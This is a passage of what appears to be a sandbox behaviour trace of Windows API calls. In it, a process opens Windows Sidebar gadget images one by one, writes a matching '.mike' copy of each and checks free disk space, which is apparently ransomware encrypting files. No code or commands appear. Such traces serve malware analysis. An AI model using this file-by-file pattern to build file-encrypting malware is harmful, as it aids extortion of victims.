ftLastWriteTime.dwLowDateTime=0xc0c028fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd37)) returned 1 [0133.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.391] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", lpFilePart=0x0) returned 0x59 [0133.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0133.391] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0133.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0133.391] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", lpFilePart=0x0) returned 0x59 [0133.391] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", lpFilePart=0x0) returned 0x59 [0133.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0133.392] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0133.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0133.392] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png.mike", lpFilePart=0x0) returned 0x5e [0133.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0133.392] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.392] GetFileType (hFile=0x284) returned 0x1 [0133.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0133.392] GetFileType (hFile=0x284) returned 0x1 [0133.392] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0133.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0133.394] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png"), fInfoLevelId=0x0, lpFileInformation=0x21b1acc | out: lpFileInformation=0x21b1acc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba1d9c5d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba1d9c5d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc0c028fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd37)) returned 1 [0133.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0133.394] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", lpFilePart=0x0) returned 0x59 [0133.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0133.394] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.394] GetFileType (hFile=0x284) returned 0x1 [0133.394] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0133.394] GetFileType (hFile=0x284) returned 0x1 [0133.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0133.396] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.396] GetFileType (hFile=0x284) returned 0x1 [0133.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0133.396] GetFileType (hFile=0x284) returned 0x1 [0133.396] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0133.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0133.396] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.396] GetFileType (hFile=0x284) returned 0x1 [0133.396] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0133.397] GetFileType (hFile=0x284) returned 0x1 [0133.398] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0133.398] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18cc8580, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x18cc8580, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x18cee6e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xf60)) returned 1 [0133.398] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0133.398] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", lpFilePart=0x0) returned 0x59 [0133.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.399] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x21bfabc | out: lpFileInformation=0x21bfabc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18cc8580, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x18cc8580, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x18cee6e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xf60)) returned 1 [0133.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.399] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", lpFilePart=0x0) returned 0x59 [0133.399] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", dwFileAttributes=0x80) returned 0 [0133.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0133.399] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18cc8580, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x18cc8580, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x18cee6e0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xf60)) returned 1 [0133.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0133.399] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", lpFilePart=0x0) returned 0x59 [0133.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0133.400] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_up.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0133.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0133.401] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png", lpFilePart=0x0) returned 0x57 [0133.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0133.401] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_up.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.401] GetFileType (hFile=0x284) returned 0x1 [0133.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0133.401] GetFileType (hFile=0x284) returned 0x1 [0133.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0133.402] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0133.402] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.402] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_up.png"), fInfoLevelId=0x0, lpFileInformation=0x21c2484 | out: lpFileInformation=0x21c2484*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba1d9c5d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba1d9c5d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc0c028fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xce4)) returned 1 [0133.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.402] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png", lpFilePart=0x0) returned 0x57 [0133.402] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.402] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_up.png"), fInfoLevelId=0x0, lpFileInformation=0x21c27e0 | out: lpFileInformation=0x21c27e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba1d9c5d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba1d9c5d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc0c028fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xce4)) returned 1 [0133.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.402] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png", lpFilePart=0x0) returned 0x57 [0133.402] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0133.402] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_up.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0133.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0133.402] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png", lpFilePart=0x0) returned 0x57 [0133.403] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png", lpFilePart=0x0) returned 0x57 [0133.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0133.403] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_up.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0133.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0133.403] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png.mike", lpFilePart=0x0) returned 0x5c [0133.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0133.403] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_up.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.404] GetFileType (hFile=0x284) returned 0x1 [0133.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0133.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0133.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0133.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0133.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0133.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0133.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0133.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0133.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0133.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0133.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0133.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.410] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_up.png", dwFileAttributes=0x80) returned 0 [0133.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0133.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0133.411] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0133.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0133.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0133.412] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0133.412] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0133.412] CoTaskMemFree (pv=0x4e1c10) [0133.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0133.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0133.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0133.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0133.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0133.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0133.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0133.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0133.415] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0133.415] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0133.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0133.415] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0133.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0133.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0133.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0133.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0133.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0133.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0133.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0133.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0133.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0133.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0133.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0133.427] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0133.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0133.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0133.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0133.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0133.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0133.432] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png", dwFileAttributes=0x80) returned 0 [0133.432] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0133.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0133.433] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0133.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0133.434] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0133.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0133.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0133.435] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0133.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0133.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0133.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0133.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0133.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0133.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0133.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0133.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0133.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0133.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0133.438] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0133.439] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0133.439] 